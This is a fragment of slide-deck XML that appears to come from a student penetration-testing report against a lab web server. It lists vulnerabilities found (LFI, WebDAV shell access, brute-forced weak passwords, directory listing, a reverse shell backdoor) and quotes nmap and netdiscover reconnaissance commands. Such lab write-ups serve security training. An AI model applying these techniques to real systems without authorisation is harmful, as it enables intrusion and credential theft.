                <a:tableStyleId>{499D4502-2CF4-4DBF-8ED5-DE3039875F61}</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585850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Port 80 open with public access </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1100" u="sng">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-6579 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open and unsecured access to anyone attempting entry using Port 80.  </a:t>
                      </a:r>
                      <a:endParaRPr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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Files and Folders are readily accessible. Sensitive information can can be found. </a:t>
                      </a:r>
                      <a:endParaRPr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535400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>LFI Vulnerability </a:t>
                      </a:r>
                      <a:endParaRPr b="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LFI allows access into confidential files on a site.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An LFI vulnerability allows attackers to gain access to sensitive credentials.</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26175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Root Accessibility </a:t>
                      </a:r>
                      <a:endParaRPr b="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sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Authorization to execute and command, and access any resource on the vulnerable device.</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i="1" lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Describe what this vulnerability allows the attacker to do.</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36275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDAV Vulnerability </a:t>
                      </a:r>
                      <a:endParaRPr b="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Exploit WebDAV on a server and Shell access is possible.</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If WebDAV is not configured properly it can allow hackers to remotely </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>modify</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> website content.</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17100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Ability to discover password by Brute Force Attack </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-3746</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i="1" sz="1200" u="sng">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attack that consists of systematically checking all possible username and password combinations until the correct one is found.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i="1" lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>With the use of brute force and a common passwords list (rockyou.txt), the password can be easily found.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1"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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;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2" name="Google Shape;1092;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93" name="Google Shape;1093;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{499D4502-2CF4-4DBF-8ED5-DE3039875F61}</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b="1" i="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Simple usernames </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Short names, first names, or any simple combination. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>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latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Usernames likes Ashton, Ryan and Hannah are all simple, easily obtained usernames.</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b="1" i="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Passwords </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Short, common, simple, or non-complex passwords.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Computers may quickly decipher weak passwords in a few seconds. Hackers require only the login and password to access a compromised account.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b="1" i="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache Directory Listing </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200" u="sng">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2007-0450 </a:t>
                      </a:r>
                      <a:endParaRPr b="1" i="1" sz="1200" u="sng">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Exploit WebDAV on a server and Shell access is possible.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If WebDAV is not configured properly it can allow hackers to remotely modify website content.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b="1" i="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reverse Shell Backdoor </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200" u="sng">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-13386</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i="1" sz="1200" u="sng">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Permits sending a reverse shell payload to a web server without the firewalls detecting it.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Attackers got access to the Capstone web server through a remote backdoor.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[Exploit port 80: (CVE-2019-6579)]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;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0" name="Google Shape;1100;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br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$ nmap -sV -v 192.168.1.105</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Nmap is an open source Linux command-line network scanning application used for network exploration, host discovery, and security auditing.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$ netdiscover -r 192.168.1.255/16 </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Netdiscover is an ARP scanner used to scan networks for live hosts. It can also scan subnets.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1103" name="Google Shape;1103;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4" name="Google Shape;1104;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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1106" name="Google Shape;110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7" name="Google Shape;110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br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Found that Port 80 and 22 are open and of interest to me.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered files on </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team/ashton.txt</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Google Shape;111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2" name="Google Shape;111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15" name="Google Shape;1115;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3781" l="0" r="19439" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157400" y="1480577"/>
            <a:ext cx="2859050" cy="3154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